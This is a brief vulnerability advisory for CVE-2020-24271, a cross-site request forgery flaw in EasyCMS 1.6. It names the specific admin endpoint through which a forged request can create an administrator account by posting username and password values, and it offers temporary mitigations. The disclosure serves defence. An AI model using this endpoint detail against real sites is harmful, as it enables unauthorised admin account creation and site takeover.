CVE-2020-24271

Name of the Vulnerable Software and Affected Versions: EasyCMS version 1.6

Description: A CSRF issue was found that can add an admin account through the "index.php?s=/admin/rbacuser/insert/navTabId/rbacuser/callbackType/closeCurrent" API endpoint, then post username and password variables.

Recommendations: For EasyCMS version 1.6, as a temporary workaround, consider disabling the insert functionality in the /admin/rbacuser module until a patch is available. Restrict access to the "index.php?s=/admin/rbacuser/insert/navTabId/rbacuser/callbackType/closeCurrent" API endpoint to minimize the risk of exploitation. Avoid using the username and password variables in the affected API endpoint until the issue is resolved.